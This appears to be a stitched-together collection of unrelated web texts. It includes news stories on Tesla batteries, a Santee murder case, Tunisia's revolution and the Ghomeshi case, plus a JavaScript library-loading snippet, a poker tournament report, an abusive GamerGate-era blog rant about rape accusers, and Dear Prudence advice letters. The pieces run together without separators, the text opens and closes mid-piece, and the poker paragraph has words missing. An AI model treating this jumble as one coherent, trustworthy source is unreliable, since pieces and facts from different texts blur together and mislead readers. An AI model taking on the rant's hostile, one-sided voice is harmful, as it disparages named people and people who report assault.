There are still plenty of battery skeptics out there — particularly for utility scale applications, which Tesla is also pitching, announcing collaborations with Texas utility Oncor and Southern California Edison.
“The people I talk to, and this really is technical, suggest that it's just going to be hard to make lithium-ion cheap enough at grid scale to make widespread sense,” says Richard Schmalensee, a professor and former dean at the MIT Sloan School of Management who co-chaired MIT's 2011 “Future of the Electric Grid” study. On the other hand, Oncor — a major distributor of power in Texas — has already suggested that it wants to invest several billion dollars on energy storage.
So there are a lot of details about the energy storage future that need to be worked out, especially as the market continues to grow. But for today, Tesla definitely seems to have gotten people pretty excited.
Also in Energy & Environment:
Pope Francis has given the climate movement just what it needed — faith
Automatic bill payment may be driving up your energy use — and your bills
Cool homes, hot planet: How air conditioning explains the world
You expect to find popcorn in the grocery store.. but what about in farm field? A Hardin County farmer says that some ears of his corn in a field have 'popped' on the stalk. Patrick Preston took photos of his popcorn and sent it to the UK Ag Extension for an explanation.
"The other guys were asking if he had put butter on it and if he sold it that way. They're really giving him a hard time about it," says UK Extension Agent Dr. Chad Lee.
But it doesn't look like you might think.
"The picture that was sent look like a bunch of popped corn, it's yellow. It's not white popcorn looking but corn literally did pop in the field. It was that hot," says Dr. Lee.
Dr. Lee explains that the kernels formed during a time of high heat, then it rained and kernels began filling again.
"It kept filling until it actually ruptured the seed coat and caused it to pop open," says Dr. Lee.
Exploding kernels are very uncommon and something most agriculture agents have never seen before with this kind of corn. The E-town farmer along with many others across the Bluegrass are fighting crop disease and pests. Now that it's time to harvest, farmers are finding that the lack of rain and high heat are causing the corn to suffer. That in the end may cut into their profits.
Dr. Lee says, "We're seeing maybe a 20% drop in corn from what we had last year and very erratic conditions."
At this time in the season, rain is not needed. The corn stalks have to dry in the fields before it's harvested.
Sussex police have identified the driver of a Jaguar car who launched an expletive-ridden tirade at a cyclist and also appeared to punch him in a road rage incident earlier this month.
Cyclist Eddie Bell, aged 38, posted video to YouTube of the incident, which took place near Pevensey Bay, East Sussex, the weekend before last. He made a note of the vehicle's registration number and passed it on to Sussex Police.
Quoted in the Argus, a spokesperson for Sussex Police said: “Police have the video and have identified the driver. They will be investigating this as an incident of public place violent crime.”
Here's the video of the incident. With 25 swear words in 37 seconds, it's very definitely Not Suitable For Work:
From what Mr Bell says in the description to the YouTube video, it seems that the driver may have interpreted what the cyclist says was “a cheeky wave” as an altogether more insulting gesture, although even so the reaction would strike most as being way over the top.
Mr Bell said:
Sheriffs investigators don't believe that Hailey Suder took part in the attack, but they do believe that she helped her boyfriend and his brother escape. NBC 7's Omari Fleming has more from Las Colinas Detention Center. (Published Friday, June 17, 2016)
High School Student Arrested in Connection With April Beating Death of Homeless Man in Santee
An 18-year old Santee woman is behind bars, facing a murder charge for the beating death of a homeless man.
Hailey Suder is now the third person arrested in connection with the murder of George Lowery, 50, on April 24.
Brothers Austin Mostrong, 20 and Preston Mostrong, 19, were arrested in connection to Lowery's murder.
Santee Brothers Accused of Torture in Man's Beating Death
Two Santee brothers were in custody, accused of murder, torture, robbery and kidnapping in a beating that ultimately took a homeless man's life, San Diego County Sheriff's Department officials said. NBC 7's Artie Ojeda reports. (Published Wednesday, May 4, 2016)
Lowery and his wife, Penny, lived in the riverbed in a homeless encampment.
Officials from the San Diego County Sheriff's Department (SDSO) said Penny found him unconscious in the riverbed just west of Chubb Lane and N. Magnolia Avenue in Santee. He had suffered trauma to the head.
He was taken to the hospital and died of his injuries five days later.
Now, NBC 7 has learned that Suder was present when the homeless man was beaten. Investigators said although there is no evidence she took part in the attack, Suder helped the Mostrong brothers escape.
She was arrested Thursday on the 9800 block of Via Rita, just east of Cuyamaca Street near her home in Santee.
Some neighbors told NBC 7, the allegations against Suder surprised them because the teen seemed to be a nice girl.
“If you know they're beating the guy to death, stop it. Do anything you can. Yell for help,” neighbor Lisa Kruis said.
Kruis said she is stunned that the teenager is accused of having such a blatant disregard for life.
“Remember that some day that could be you. You never know where life's going to take you,”she said.
One friend, who did not want to be identified, said Suder began to change when she started dating Austin Mostrong.
A classmate of Suder's from Santana High School expressed his disbelief that she was charged with murder.
“No one knew it was her. That' the shocking part, is that we remember hearing about it in Santana but no one ever thought it was one of us. So that's the shocking part, really,” said Justin Fejeran.
Suder was a senior at Santana High School and pictures showed that she had been a cheerleader.
Lowery's wife Penny told NBC 7 previously that her husband was beaten after a dispute over a paintball gun. She said he had tried to protect another homeless man a week before he was killed.
The Mostrong brothers have pleaded not guilty to charges of kidnapping, murdering and torturing George Lowery.
Suder is scheduled to be arraigned next week.
Last month, Xiaomi announced the Mi 6 in China. Upon closer inspection it was revealed that the phone does not have a headphone jack, like so many others in the past year.
When asked why, Xiaomi had the same reason to give as Apple. According to the quote given to Android Central, not having the headphone jack allowed Xiaomi to make space for other components, such as a bigger battery. Indeed, the Mi 6 has a larger 3350mAh battery over the 3000mAh one on the Mi 5 despite being roughly the same size.
With the headphone jack gone, the Mi 6 now relies on the USB-C connector to output audio (apart from Bluetooth). Xiaomi says that USB-C audio is now becoming more common and will continue to provide excellent audio quality.
Source
Tunisia's interim president, Foued Mebazaa, yesterday vowed "a complete break with the past" to calm fears that the revolution was being hijacked by the presence of the dictatorship's ruling party in the interim government.
In his first televised speech, Mebazaa promised a "revolution of dignity and freedom" following the ousting of Tunisia's dictator president, Zine al-Abidine Ben Ali, after four weeks of street protests. Mebazaa promised to honour "all the legitimate aspirations of the uprising".
Yesterday, as the interim cabinet held its first meeting, around 500 protestors, mostly the radical left and trade unions, took to the streets in central Tunis demanding that the ruling RCD party be excluded. But the mood in the capital was lightening.
Unlike previous days, the protesters on Bourguiba Avenue were not teargassed or beaten but were instead allowed to stand peacefully protesting until nightfall. Political prisoners, including a key dissident journalist, began to be released, the curfew was shortened, cafes reopened and people milled to work. In the narrow streets of the old medina, tourists were bartering over bags.
On Bourguiba Avenue, Azizi Tej stood in the crowd of demonstrators chanting "Tunisia is free". An activist in the once banned Islamist Ennahda party, he had been imprisoned three times, tortured, had staged a series of hunger strikes, and had now taken to the streets with the secular radical left. He wanted the remnants of Tunisia's old regime, the RCD party, to be excluded from the temporary caretaker government.
"The Islamists want democracy," Tej said. "Lots of us were tortured, it was our Guantánamo Bay. We've paid a high price and now some people want to paint us as monsters, we're not. My religion teaches that I must accept others. We're proud to share the same God, Jews and Christians are our brothers. We don't refuse women's freedoms, we don't refuse tourism – people would die of hunger if we didn't have tourism."
"The government has to listen to the street," said Salem Ben Yahia, a film-maker and former political prisoner. "We don't want our revolution hijacked. We forced a dictator out the door and now he's come back in the window. His old ministers are still in a majority in this transition government and that has to change. Police have already shot at us and beaten us to stop us protesting, but we come back again like a tide." In his pocket he had a hankie doused in vinegar to protect himself from teargas. But riot police were standing back.
Ministers were last night trying to hold together the government after three trade union ministers quit and political sources said minor changes would have to be made to the government in the coming days. A fourth minister, Mustafa Ben Jaafar, head of the small Democratic Forum for Freedom and Labour, who had hesitated over a full resignation, did so yesterday. "We have pulled out of the government officially," his party said.
One insider at the transport ministry said nothing had changed in the civil service, the state apparatus was still in place and functionaries remained party members. "You had to be in the party to progress in your career. At work, we still daren't even talk about the revolution, people are still afraid of talking," he said.
Tunisian state television reported the government had released 1,800 prisoners sentenced to less than six months for minor offences. Chebbi of the PDP opposition party said these included political prisoners, particularly members of the banned Islamist movement Ennahda. But figures were not available of how many people had been released. Secrecy under the ousted dictator Ben Ali meant that the number of those detained for political reasons was never made public.
A further insight into the events of last week was provided by a government minister, who told Reuters yesterday that Ben Ali had informed prime minister Muhammad Ghannouchi that he was considering returning from exile, but Ghannouchi had told him that was impossible. Najib Chebbi, an opposition leader who is now regional development minister, said the exchange took place by telephone.
Meanwhile, investigations were beginning into the scale of violence during the weeks of brutally repressed demonstrations which led to the revolution. The UN estimated that at least 117 people died, including 70 killed by live fire, in five weeks of bloodshed linked to demonstrations which led to the ousting of Ben Ali.
UN human rights officials will go to Tunisia next week to help investigate the violence and advise the new coalition government on justice and reforms, UN high commissioner for human rights Navi Pillay said yesterday.
Pillay said her human rights team, authorised by the government, would begin work immediately: "We've never been able to act so quickly before."
As Switzerland moved to freeze Ben Ali's assets, demonstrators in the Tunis crowd included people whose homes had been appropriated by the family of Ben Ali and his wife. A businessman said his 13th century villa in a prime Tunis suburb was taken over by a relative of the first lady, Leila Trabelsi. He had complained to the justice system and was harassed and had his passport taken away. "We want the government to return the people's wealth that they plundered," he said.
France said it had intercepted a shipment of riot gear, including tear gas canisters and bullet-proof vests, ordered by Ben Ali just before his downfall.
Moncef Marzouki, the leader of a small opposition party who returned to Tunisia from exile in France this week, visited the grave of the unemployed graduate and vegetable seller, Mohamed Bouazizi, who set fire to himself in an act of protest and started the wave of unrest which toppled Ben Ali.
Marzouki, who plans to run for president, also went to where Bouazizi set himself on fire in the town of Sidi Bouzid. About 300 people greeted him, with banners urging the interim prime minister to quit and "The people demand that Ben Ali's people leave!"
At the small Tunis demonstration, people vowed to keep up pressure for the interim government to feature more than a handful of opposition figures. "People died, are we going to waste their blood?" asked Solef, an unemployed graduate who sells sweets. "It's our duty. People here walk with their heads held high."
Epic rock, paper, scissors match betweet Western Michigan and Dayton lacrosse teams.
Inclement weather may have cancelled the lacrosse game, but the battle between Western Michigan and Dayton University was fought nonetheless.
Earlier this week, the two schools were forced to put away their lacrosse sticks as the game was cancelled due to lightning in the area. But no one was interested in shaking hands and calling it a draw. These boys came to compete.
Scroll to continue with content Ad
Enter one of the most epic games of rock, paper, scissors that has ever been played. Best two out of three, of course.
Western Michigan got on the board first with a deft (scissors) win over Dayton's paper. It's win or go home for Dayton, and this is where things get interesting.
With Western up 1-0, both teams draw the same tool on back-to-back draws; first paper, then rock. The tension in the crowd is palpable (love the collective gasps as the two teams draw the same tool twice). Western then delivers the decisive blow with the next draw; paper, wrapping up Dayton's lowly rock, and it's game over.
It may not count on its regular season record, but the Western Michigan Broncos were champions on this day. If only every rained-out game could be decided in one minute of intense competition.
The US embassy in London summons a three-month-old baby to make sure it is not resorting to terrorism.
The call came after Harvey Kenyon-Cairns's grandfather, Paul Kenyon, made a simple error while filling out a form for his grandson, The Guardian reported.
Kenyon, who was filling out a US visa waiver form for the baby, mistakenly responded “yes” to the question, “Do you seek to engage in or have you ever engaged in terrorist activities, espionage, sabotage, or genocide?”
“I couldn't believe that they couldn't see it was a genuine mistake and that a three-month-old baby would be no harm to anyone,” said the 62-year-old.
The three-month-old's first overseas holiday, which involved a flight to Orlando in Florida, was subsequently refused by authorities.
‘Expensive mistake'
Since the officials said they needed to question the infant, it was taken from his home in Poynton, Cheshire, to the embassy in Grosvenor Square, London, a trip that reportedly took about 10 hours.
“Baby Harvey was good as gold for the interview and never cried once. I thought about taking him along in an orange jumpsuit, but thought better of it,” said Kenyon. “They didn't appear to have a sense of humor over it at all and couldn't see the funny side.”
Apart from the trouble, the “expensive mistake” mad cost the family an extra £3,000.
“It was a very expensive mistake, but I was hoping the US embassy would realise that it was just a simple error without us having to jump through all the hoops,” said Kenyon. “If you were a terrorist, I suspect you'd not be ticking yes on the Esta form anyway.”
The grandfather further stated that his grandson has “obviously never engaged in genocide, or espionage, but he has sabotaged quite a few nappies in his time, though I didn't tell them that at the US embassy.”
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <script src="https://somedomain.com/path/to/plugin.js"></script> <script src="https://somedomain.com/path/to/anotherplugin.js"></script> <script> $(document).ready( function() { // Do stuff with the $ object here $.foo.bar() } ); </script> Loading Method: Statically loaded (by default). Scope: The jQuery / $ objects are global. Plugins: To go beyond base library functionality, jQuery has the concept of "plugins" which are loaded in via additional <script> tags, or a dynamic loader. All examples on this page use core library methods (no plugins).
<script src="http://yui.yahooapis.com/3.8.0/build/yui/yui-min.js"></script> <script> YUI().use( 'module1', 'module2', 'module3', function (Y) { // Do stuff with the Y object here Y.foo.bar() } ); </script> Loading Method: Dynamically loaded (by default). Scope: The YUI loader object is global, and the Y object is local to each "sandbox" (your callback function). However, the return value of YUI().use() is a Y object, which you can assign to a global variable [e.g. var Y = YUI().use(…); ]. Modules: Functionality in the YUI library is provided by "modules", which are split between core (officially supported) and gallery (user contributed). Simply adding YUI().use(function(Y){}); doesn't get you much, so you will need to specify which modules you wish to use and the loader will fetch them for you. The following core modules should provide you all the functionality for the examples in this document: YUI().use( 'node', 'io', 'event', 'animation', function (Y) { // example code here } ); If any additional modules are needed, they'll be specified in the "notes" section to the example.
ISP Group Threatens Suit if FCC Thwarts Protectionist State Laws
Insisting they're interested in protecting states rights, the rather official-sounding "National Conference of State Legislatures" this week sent a letter (pdf) to the FCC, saying it intends to file a lawsuit if the agency acts to pre-empt state bans on community broadband builds.
FCC boss Tom Wheeler has lately proclaimed several times he intends to take actions against such bans, which are usually written and lobbied for by incumbent ISPs, eager to thwart the faster, cheaper services such networks can provide.
These bills are the very worst sort of protectionist legislation -- legislation that strips away the right from citizens to make infrastructure and investment decisions for themselves. While it remains wholly unclear how Wheeler would do it (or if he's just paying empty lip service to the idea), eliminating them would give the power back to the states -- something that should technically appeal to those with Conservative values.
Still, politicians flush with cash from the likes of AT&T and Comcast (like Martha Blackburn) have rushed to the defense of these bills, pretending to be breathlessly protecting state rights. Blackburn recently successfully passed a bill in the House that would strip FCC funding if they take any action against these state measures.
As for the NCSL, they too insist the group is solely interested in states rights.
"As you consider your course of action on this matter, we encourage you to heed the principles of federalism and caution you of the numerous decisions by the United States Supreme Court with regard to the relationship between the state and its political subdivisions," states the group. "Such an attempt disregards the countless hours of deliberation and votes cast by locally elected lawmakers across the country and supplants it with the impulses of a fivemember appointed body in Washington, DC."
Granted if you look at the NCSL's sponsor list , you'll notice some very familiar names including AT&T, Comcast and Time Warner Cable -- all of which were responsible for writing the very protectionist laws the NCSL is trying to protect on behalf of "states rights."
Hi everyone. Thanks for coming out and listening. My name is Kathryn Borel. In December of 2014, I pressed sexual assault charges against Jian Ghomeshi. As you know, Mr. Ghomeshi initially denied all the charges that were brought against him. But today, as you just heard, Jian Ghomeshi admitted wrongdoing and apologized to me. It's unfortunate, but maybe not surprising, that he chose not to say much about what exactly he was apologizing for. I'm going to provide those details for you now.
Kathryn Borel, a former producer for Q at CBC, was interviewed on that show by Jian Ghomeshi about her memoir "Corked," in 2009. Borel brought a complaint forward that led to a charge of sexual assault against Ghomeshi. The Crown withdrew the charge on Wednesday. ( Fozo, JP / CBC/YouTube ) Complainant Kathryn Borel makes a statement outside court on Wednesday about Jian Ghomeshi's conduct. ( Toronto Star / Bernard Weil )
Every day, over the course of a three-year period, Mr. Ghomeshi made it clear to me that he could do what he wanted to me and my body. He made it clear that he could humiliate me repeatedly and walk away with impunity. There are at least three documented incidents of physical touching. This includes the one charge he just apologized for, when he came up behind me while I was standing near my desk, put his hands on my hips, and rammed his pelvis against my backside over and over, simulating sexual intercourse. Throughout the time that I worked with him, he framed his actions with near daily verbal assaults and emotional manipulations. These inferences felt like threats, or declarations like I deserved to have happening to me what was happening to me. It became very difficult for me to trust what I was feeling. Up until recently, I didn't even internalize that what he was doing to my body was sexual assault. Because when I went to the CBC for help, what I received in return was a directive that yes, he could do this, and yes, it was my job to let him. The relentless message to me, from my celebrity boss and the national institution we worked for were that his whims were more important than my humanity or my dignity. So I came to accept this. I came to believe it was his right. But when I spoke to the police at the end of 2014, and detailed my experiences with Mr. Ghomeshi, they confirmed to me what he did to me was, in fact, sexual assault. And that's what Jian Ghomeshi just apologized for: the crime of sexual assault. This is the story of a man who had immense power over me and my livelihood, admitting that he chronically abused his power and violated me in ways that violate the law. Mr. Ghomeshi's constant workplace abuse of me and my many colleagues and friends has since been corroborated by multiple sources, a CBC fifth estate documentary, and a third-party investigation.
Article Continued Below
In a perfect world, people who commit sexual assault would be convicted for their crimes. Jian Ghomeshi is guilty of having done the things that I've outlined today. So when it was presented to me that the defence would be offering us an apology, I was prepared to forego the trial. It seemed like the clearest path to the truth. A trial would have maintained his lie, the lie that he was not guilty, and it would have further subjected me to the very same pattern of abuse that I am currently trying to stop. Jian Ghomeshi has apologized, but only to me. There are 20 other women who have come forward to the media and made serious allegations about his violent behavior. Women who have come forward to say that he punched, and choked, and smothered and silenced them. There is no way that I would have come forward if it weren't for their courage. And yet Mr. Ghomeshi hasn't met any of their allegations head on, as he vowed to do in his Facebook post of 2014. He hasn't taken the stand on any charge. All he has said about his other accusers is that they're all lying and that he's not guilty. And remember: that's what he said about me. I think we all want this to be over. But it won't be until he admits to everything that he's done. Thank you. RELATED: Ghomeshi charges withdrawn 2014-Star interview with Kathryn Borel
Read more about:
Presidential candidates Donald Trump and Hillary Clinton are locked in a virtual tie in the UPI/CVoter daily tracking poll released Wednesday. UPI file
WASHINGTON Sept. 15 (UPI) -- The UPI/CVoter daily presidential tracking poll released Thursday shows Donald Trump and Hillary Clinton in a virtual tie.
The online poll shows Trump with 47.93 percent to Clinton's 47.05 percent.
The most recent data reflect a significant one-day shift for Clinton, who ticked up 1.33 percentage points in one day, while Trump lost nearly 1 percent.
The UPI/CVoter online tracking poll surveys at least 200 people each day, leading to a sample size of roughly 1,400 people during any seven-day span.
Because the poll is conducted online and individuals self-select to participate, a margin of error cannot be calculated. The poll has a credibility interval of 3 percentage points. This seven-day span includes data collected from Sept. 7 to 13, when 1,811 individuals were surveyed. Of them, 1,245 identified themselves as likely voters.
One of my biggest problem with rad fem rags like Jezebel, is that they always insist on listening and believing every single rape accuser that comes down the pike. This goes against my inner defense attorney spirit. I naturally give people the presumption of innocence, no matter what they're accused of. Time and time again, I've seen talking heads like Amanda Marcotte, Jessica Valenti, and the third-rate hacks at Jezebel, refuse to doubt ANY female accuser. Take a look at Marcotte from yesterday, quite rightly described by Twitchy as “off the deep end:”
Interesting how rape apologists think that if they can “discredit” one rape story, that means no other rape stories can be true, either. — Amanda Marcotte (@AmandaMarcotte) December 5, 2014
Uh, I don't know anyone who's saying that, Amanda. What the fuck are you talking about, exactly? It's almost like you're trying to setup a straw-man argument that doesn't actually exist. Of course our foes wouldn't do such a thing, right? I'm being sarcastic, of course. They make their living off intellectually dishonest trash like this. I could show you more Marcotte madness, but I really came here to talk about Jezebel, and Gawker Media.
Few outlets went as far as Jezebel and Gawker did in backing this hoax. Anna Merlan, for example, wrote a column on Monday that looks laughable, in retrospect:
Actually, yes, it does now appear to be a giant hoax, Anna. To her credit, she did issue a half-assed apology yesterday. The problem is, she still doesn't take full blame, instead shifting responsibility over to Rolling Stone. She's right, they could have done better. But, it's still her responsibility as a citizen to remain skeptical when allegations like these are made, especially when there's no other backing besides one accuser's word:
“This is really, really bad. It means, of course, that when I dismissed Richard Bradley and Robby Soave's doubts about the story and called them “idiots” for picking apart Jackie's account, I was dead fucking wrong, and for that I sincerely apologize. It means that my conviction that Sabrina Rubin Erdely had fact-checked her story in ways that were not visible to the public was also wrong. It's bad, bad, bad all around. (And, frankly, it could have been avoided, had Erdely been clearer in her disclosures about what she'd done to reach Jackie's alleged attackers and what her agreement with the girl had been. This announcement wouldn't be producing nearly the same shockwaves if those things had been clearly outlined.)”
So, she's still ducking blame, but at least there's a starting point. Over on the main Gawker site, they're not willing to go that far. Instead our old friend Sam Biddle spends his time casting doubt on the fraternity's statement. He's a true believer, if there ever was one. I guess he doesn't have any good bullying targets for the holidays, so he's taken to propping up false rape allegations, instead. Whatever the case, he's just as odious as he's ever been:
So, Gawker has now taken a harder SJW position that even Jezebel. A couple of months ago, I might be surprised by this, but then again, probably not. Gawker has been the shithole of the Internet for many years now. Who knows if Biddle even believes the propaganda he writes. It doesn't even matter at this point. They just spit out any old controversial take in order to get clicks, whether they believe in it, or not.
Sam Biddle, Gawker, and Jezebel continue to look like fools. We just have to sit back, and expose their bullshit. Discredit them in the eyes of the masses every time they step out of line. They'll always have their audience, but we can shrink it, while we simultaneously build our own. GamerGate has brought more troops to the battle. The people who have been doing this for years were very happy to see us. Don't worry, Based Mom. We're not going anywhere.
I always expected other liberal-minded scholars to join me in exposing 3rd wave feminist lunacy.Never happened.But now the gamers r here. — Christina Sommers (@CHSommers) August 31, 2014
A Transportation Security Administration officer, right, checks a passenger's airline ticket at Terminal 3 at O'Hare International Airport in Chicago on Friday, Dec. 20, 2013. A local weather forecast predicts rain will continue Friday with some light freezing drizzle, with a chance of rain and sleet Saturday morning, turning to snow and sleet in the afternoon. A stew of foul weather, ranging from freezing rain and snow in the Midwest to thunderstorms and possible tornadoes in the South, is arriving just in time for one of the busiest travel weekends of the year. (AP Photo/Nam Y. Huh)
You may be better off not reading this if you're one of the millions of Americans traveling this holiday season. However, one safety expert is desperate for you to know: Airport security in the U.S. is basically a sham.
“Checking luggage is very nice, it looks great, taking away the breast milk of the mother of a one month old baby, that looks great,” said Rafi Sela, the president of A.R. Challenges, a transportation consulting firm based in Israel. “It does nothing for security. It's just a show.”
For years, Sela has been calling for the “Israel-ification” of America's airports. Supporters of the tactic -- which involves a great deal more face-time with passengers -- say Israel's airports effectively deal with much higher threat levels than American airports with way less hassle. At Tel Aviv's Ben-Gurion airport, for example, passengers go through a series of screenings and interviews in lieu of dumping out their liquids and submitting to full body scanners. And Israeli airports' security is seldom breached.
For their part, TSA representatives say the agency is constantly updating security procedures based on the latest intelligence and on customer feedback.
“The Transportation Security Administration (TSA) is working to find and implement new ways to make travel not only more secure, but also more efficient,” TSA spokesman Ross Feinstein wrote in a statement. “These efforts are part of a system-wide shift away from the one-size-fits-all security model following the 9/11 attacks, and toward a transportation security system shaped by risk, and driven by the latest intelligence.”
But as Sela has argued in a variety of places, including The New York Times, The Toronto Star and most recently humor site Cracked, traveling through an Israeli airport is safer and less of a hassle than in America.
That's because the system in place at American airports emphasizes checking every single piece of luggage over strategies like making direct eye contact when interviewing passengers, according to Sela, who has consulted with American airports. And there are a variety of political factors that make the agency hesitant to change, he said.
“I don't want to frighten anybody, but today even the stupidest terrorist can circumvent the airport security in two seconds,” Sela said.
While America's airport security system may not be ideal, there are a number of factors that prevent us from “Israel-ifying” our airports, critics of the tactic say. For one, the U.S. airport system is dealing with a much higher volume of passengers and aircraft than in Israel. About 5.53 million people are expected to travel through America's airports just during this Christmas season. By comparison, Ben Gurion, Israel's largest airport, hit a record when 70,000 people passed through in one day in August, according to the Globes, an Israeli news site.
"The Israeli airport security model doesn't scale," security expert Bruce Schneier told The National Geographic.
WILDWOOD � An 88-year-old Dunnellon man who had been reported missing died when he collided with another car Friday while driving the wrong way on Interstate 75.
Clifford Shilling was critically injured in the wreck and later died at Ocala Regional Medical Center, the Florida Highway Patrol said.
Ocala police first spotted Shilling's Volkswagen Passat heading south in the northbound lanes of Interstate 75 just before 5 a.m. They notified the Florida Highway Patrol, which intercepted the Passat and tried to get it to pull over.
FHP Sgt. Steve Gaskins said attempts to alert the driver that he was going the wrong way failed, and troopers eventually discovered that a Silver Alert had been issued for the driver earlier in the day.
Sumter County deputies created a blockade with their cars to keep northbound traffic away from the pursuit as deputies up ahead of them put stop sticks across the road hoping to disable Shilling�s vehicle.
However, a northbound driver maneuvered around the law enforcement barricade and ran over the spikes first near mile marker 329 in Wildwood. The tires punctured, the driver pulled his vehicle over in the emergency lane of the interstate.
Shilling struck the Chevy head on, then also hit a northbound semi-truck.
The Chevy�s driver, 65-year-old Dale Yokoyama of Largo, was taken to Ocala Regional with serious injuries.
No injuries were reported to the driver of the truck.
Shilling, who was last been seen leaving his home about 12:45 a.m., suffered from dementia and other medical problems, and was without his medication, the Marion County Sheriff's Office said.
This is the second time in less than a month that a head-on crash occurred after officers used stop sticks to try to end a chase.
On May 12, Mylynda Martinez was fleeing Lake County sheriff's deputies in Mascotte. Mascotte police, who were aiding deputies, threw the spiked sticks in front of the suspect�s southbound Kia in an attempt to puncture its tires, and she veered into the oncoming Cadillac Escalade of Kimberly King.
Both motorists died.
It was the 8th Anniversary of the $215 Sunday Millions of PokerStars on 2nd March 2014 and the mega online poker giant didn't leave any stone unturned to meet up its $8 Million guarantee. From mega satellites to deposit codes to step wise freerolls, PokerStars churned up the complete repertoire to meet the numbers. In the end, the party was a good one with 46586 in attendance creating a prize pool of $9,317,200, the biggest ever for the Sunday Million since its inception. The final man standing was DrUPSWING who took home a fat pay check of $1,038,500.
The satellites started from $0.88 +R, $1.65+R, $4.44+R which satiated the small poker pocket to the bigger SNG's guaranteeing seats for $44, $88 etc. There were also bonus code offerings floated around by PokerStars where in a player needed to deposit $100 in their account to get a ticket to the $11 satellite to the big Milly. The whole event was being advertised as a ‘ticket from $1 to $1 Million' considering the buy-ins for satellites were so small and the first prize so big.
While each Sunday this popular showcase tourney sees traffics of around 8000 players, this event saw five times the traffic with many benefiting from the small satellites running every hour of every day since a month. This author itself also qualified through a $1.65 +R satellite and finished 22/23 to get a seat to the 8th anniversary Sunday Million.
In the end, the event that kicked off at 0100 India time and has 180 minutes of late registration saw players rolling in and out till 0400. Then on things slowed down a bit and then extremely slow when the money bubble burst at 5997th place. The tourney formed its final table after a taxing 13 hours of play but then on the grind became too much and players started getting eliminated early. An Asian poker player in the form of missoon of South Korea was the unfortunate FT bubble. Early eliminations within minutes formed pads1161(9th place), uninc157(8th place), pinkfinger in 7th place, tempOr2k in 6th place and kukoc69 in 5th place.
At this time, players were discussing a deal when the break happened. cynfarAA was the one to initiate the discussion when the final 4 remained. the tourney was paused and a deal proposal was sent. DrUPSWING who was the biggest stack with more than 280,000,000 chips would get $1,091,629 and $160,000 was reserved for first place. hdjgkfkgsdl who was little less than 98,000,000 chips reserved $625,098 and cynfarAA got $548,563 while the smallest stack of MRJ1111 would get $419,171. But hdjgkfkgsdl didn't agree and the tourney went on.
When MRJ1111 got eliminated in 4th place, the deal was again discussed but didn't come through. Play resumed again and cynfarAA as expected exit in 3rd place. Heads up action ensued with DRUpswing holding double the chips. the players finally struck a deal when hdjgkfkgsdl had secured two double ups and thus got an equal money deal with $160,000 reserved for the winner. In the end it took the of Drupswing to defeat the as the latter hit an awesome full house with
Amongst Indian poker players, a generic search of the top 2500 ITM finishes in the PokerStars gave out the following stats:
PSUStudent finished in 635th place for $931
bhindicutter finished in 1099th place for $838
harnand finished in 2087th place for $652
The final table payouts of the PokerStars 8th Anniversary Sunday Million are:
Get Dear Prudence delivered to your inbox each week; click here to sign up. Please send your questions for publication to prudence@slate.com. (Questions may be edited.)
Got a burning question for Prudie? She'll be online at Washingtonpost.com to chat with readers each Monday at 1 p.m. Submit your questions and comments here before or during the live discussion.
Dear Prudence,
A few months ago, in order to spice up our sex lives, I persuaded my wife of four years to try swinging. I searched online and found an ordinary-looking couple I thought would suit us to begin with. We met, had dinner, went to a hotel, and swapped partners. I am a fit, fairly good-looking, well-endowed man. I was surprised and dismayed when the other man, who is older, somewhat overweight, and balding, undressed. He was way larger than me, and for two hours I had to watch him work my wife into multiple fits, screams, and moans. Since this experience (which we have not repeated), I haven't been able to look at my wife in the same way. I cannot get that night out of my mind. It's affecting my work and ability to be happy. Sometimes I feel I could just punch my wife in the face. I want a divorce. The few friends I have confided in about this say that I am being unfair, but I cannot see how I could possibly be content in my marriage ever again. Is there a way I can overcome this?
—Outgunned Husband
Dear Outgunned,
Next time you consider swinging, choose your new partners more carefully. You're looking for an advertisement that says something like, “She's svelte, stacked, and sexy. He's fat, bald, hung like a gnat, and suffering from erectile dysfunction.” How sweet for your wife, whom you coerced into this, that the male member of your “ordinary couple” ended up being an oversized piston. Perhaps you watched her having the best sex of her life while neglecting your own duties. Possibly your wife was putting on something of a show just to yank your chain. Now you want to divorce her, after first giving her a sucker punch. If you feel you're actually a danger to your wife, you need to tell her and move out for her safety. You sound like quite a prize, and since you've obviously been behaving abominably since your encounter, I hope your wife has already tied up the services of the best divorce lawyer in town. However, if both of you want to salvage your marriage, you need the help of a mental health professional. You've fallen into an obsessive spiral that's destroying you. You need medication, or meditation, or some intervention to get your thoughts back on track. Whether or not your wife is willing to rebuild your marriage, you owe her an apology. Tell her that you made a dreadful mistake and you hate that you pressured her to have sex with another man. Then take a look at Aesop's fable about the tortoise and the eagle, which is a nice summary of the consequences of getting what you wished for.
—Prudie
Dear Prudence: My Cousin Married My BFF
Dear Prudence,
My fiance, “Zeke,” and I have found out we are expecting a child, and we are elated. However, Zeke is nervous because his paternal side of the family has a long history of depression, alcoholism, and suicide. I don't share his worries because I have believed for a long time that Zeke's dad is not his biological father. Zeke doesn't at all resemble him. Both he and Zeke's mother have blue eyes and Zeke's eyes are brown, which is genetically possible but rare. Zeke's mother has been married and divorced almost as many times as Liz Taylor and had quite a reputation. A few years ago, Zeke's mother gave me a bunch of his childhood photos. For the first seven years of Zeke's life a brown-eyed man, a “friend of the family,” appeared in many of them, affectionately holding Zeke. The man, who is deceased, is a ringer for Zeke. Zeke's supposed father is an unreliable jerk who's mostly been absent. I don't want to hurt my future mother-in-law, but I do want Zeke to be able to free himself from the worry of a family history that is probably not his. Should I just shut my mouth for all time, or is there any way to speak frankly with my future mother-in-law about Zeke's paternity?
—Ms. Sherlock
Dear Ms.,
Your sleuthing is intriguing but inconclusive. Resemblances can be powerful, but they can also be deceiving. I've heard from adoptive parents wondering what to say when people note how much their children look like them. But assuming you're right, this is no happy ending—it's just a big hole where his father should be. As for inheriting more promising genes from the mysterious brown-eyed man, sure, he could have been a doctor who died on a humanitarian mission. He could also have been a cad who killed himself while driving drunk. You can't know any of this until you raise this potentially explosive issue and Zeke tries to get an answer from his mother. She might not even be totally sure who Zeke's father is. To rule out his current father, he and Zeke will have to take a paternity test, and both of them might be reluctant. All told, it seems it would be best for you to keep your deductions to yourself. But your tone suggests that this is about to burst out of you, so if you're going to reveal your suspicions, you need to start with Zeke, not his mother. Gather the photos and explain that this has been gnawing at you for years, but now that you're going to be parents, and he's worried about his genetic heritage, you felt you had to speak. Emphasize the word, might when you lay out the evidence. Be prepared that Zeke could be either grateful that his relationship with his “supposed” father finally makes sense or resentful that you've just upended his emotional life.
—Prudie
Dear Prudie,
